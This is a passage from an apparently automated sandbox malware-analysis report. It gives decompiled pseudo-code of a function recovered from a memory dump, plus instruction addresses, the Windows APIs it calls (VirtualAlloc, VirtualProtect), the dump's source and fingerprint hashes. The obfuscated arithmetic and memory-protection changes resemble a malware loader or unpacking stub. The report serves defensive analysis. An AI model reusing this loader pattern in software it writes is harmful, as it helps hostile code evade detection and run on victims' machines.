                  					_t87 =  *_t101;
                  					 *_t101 =  *((intOrPtr*)(_t60 + 0x41c627));
                  					 *_t101 =  *(_t60 + 0x41c166);
                  					VirtualProtect(_t55, _t87, _t101,  *(_t97 - 4));
                  				}
                  				_push(_t72);
                  				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  				_t89 = _t87;
                  				_push(_t72);
                  				 *((intOrPtr*)(_t101 + 4)) =  *((intOrPtr*)(_t60 + 0x41ceca));
                  				_t99 = _t97;
                  				_t49 = E046B746C(_t60, _t72, _t79, _t89);
                  				_push( *((intOrPtr*)(_t60 + 0x41c627)));
                  				_pop( *_t24);
                  				_push( *(_t99 - 8));
                  				_pop(_t62);
                  				 *_t101 = _t62;
                  				_t65 = 0;
                  				_t67 = 0 ^  *(_t60 + 0x41c166) | 0 ^  *(_t60 + 0x41c166);
                  				_t81 = _t67;
                  				_t68 = _t65;
                  				if(_t67 != 0) {
                  					 *(_t99 - 8) = 0;
                  					 *_t101 =  *_t101 ^ _t81;
                  					_t49 = E046B2A69(_t49, _t60, _t68, _t72, _t81, _t89,  *(_t99 - 8));
                  				}
                  				_t75 = _t72;
                  				_t51 = memset(_t81, _t49 ^ _t49, _t68 << 0);
                  				_t102 = _t101 + 0xc;
                  				_t82 = _t81 + _t68;
                  				if( *((intOrPtr*)(_t60 + 0x41c3f9)) != _t60) {
                  					_push(0);
                  					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  					_t82 = _t82; // executed
                  					_t52 = E046B5F16(_t51, _t60, 0, _t75, _t89); // executed
                  					_push(_t52);
                  					 *((intOrPtr*)(_t102 + 4)) =  *((intOrPtr*)(_t60 + 0x41c3f9));
                  					_t54 = _t52;
                  					_t51 = E046B8F3B(_t54, _t60, 0, _t75, _t82, _t89);
                  				}
                  				 *(_t99 - 4) = _t82;
                  				 *(_t102 + 0x14) = _t75 & 0x00000000 | _t82 ^  *(_t99 - 4) |  *(_t60 + 0x41d140);
                  				 *_t41 =  *(_t60 + 0x41d140);
                  				_t78 =  *(_t99 - 8);
                  				_push(_t89);
                  				 *(_t99 + 4) =  *(_t99 + 4) & 0x00000000;
                  				 *(_t99 + 4) =  *(_t99 + 4) ^ _t89 & 0x00000000 ^ _t78;
                  				asm("popad");
                  				return _t51;
                  			}




























                  0x046b709d
                  0x046b709d
                  0x046b709d
                  0x046b709d
                  0x046b709e
                  0x046b70a5
                  0x046b70ab
                  0x046b70ae
                  0x046b70af
                  0x046b70b2
                  0x046b70b6
                  0x046b70ba
                  0x046b70c1
                  0x046b70cb
                  0x046b70d0
                  0x046b70d0
                  0x046b70d6
                  0x046b70dd
                  0x046b70e0
                  0x046b70e3
                  0x046b70e9
                  0x046b70f5
                  0x046b70fc
                  0x046b7102
                  0x046b710a
                  0x046b710c
                  0x046b7112
                  0x046b7119
                  0x046b711d
                  0x046b712b
                  0x046b712b
                  0x046b7135
                  0x046b7138
                  0x046b7138
                  0x046b713e
                  0x046b7146
                  0x046b714a
                  0x046b714b
                  0x046b7153
                  0x046b7157
                  0x046b7158
                  0x046b715d
                  0x046b7163
                  0x046b7166
                  0x046b7169
                  0x046b716c
                  0x046b7179
                  0x046b717d
                  0x046b717f
                  0x046b7181
                  0x046b7182
                  0x046b7184
                  0x046b718e
                  0x046b7191
                  0x046b7191
                  0x046b719d
                  0x046b719e
                  0x046b719e
                  0x046b719e
                  0x046b71a6
                  0x046b71a8
                  0x046b71b0
                  0x046b71b4
                  0x046b71b5
                  0x046b71ba
                  0x046b71c2
                  0x046b71c6
                  0x046b71c7
                  0x046b71c7
                  0x046b71cc
                  0x046b71e0
                  0x046b71ea
                  0x046b71f0
                  0x046b71f1
                  0x046b71f7
                  0x046b71fb
                  0x046b71ff
                  0x046b7201

                  APIs
                  • VirtualAlloc.KERNELBASE(00000000), ref: 046B70D0
                  • VirtualProtect.KERNELBASE(?,?,?,?,00000000), ref: 046B7138
                  Memory Dump Source
                  • Source File: 00000003.00000002.299586396.00000000046B0000.00000040.00000001.sdmp, Offset: 046B0000, based on PE: true
                  Similarity
                  • API ID: Virtual$AllocProtect
                  • String ID:
                  • API String ID: 2447062925-0
                  • Opcode ID: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
                  • Instruction ID: 548cff5d69af00c5baffd31ea47945d72b0078245201a25e4bb85d577d56f5c0
                  • Opcode Fuzzy Hash: 18536275ed15e287df20e35805b6b78dcc94a8a38b1e94fc381fd54ff5dd0b3d
                  • Instruction Fuzzy Hash: 0C417F72904204EFEB049F64C885BEEBBF5EF88311F09849DEC89AB245D7702950DB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Non-executed Functions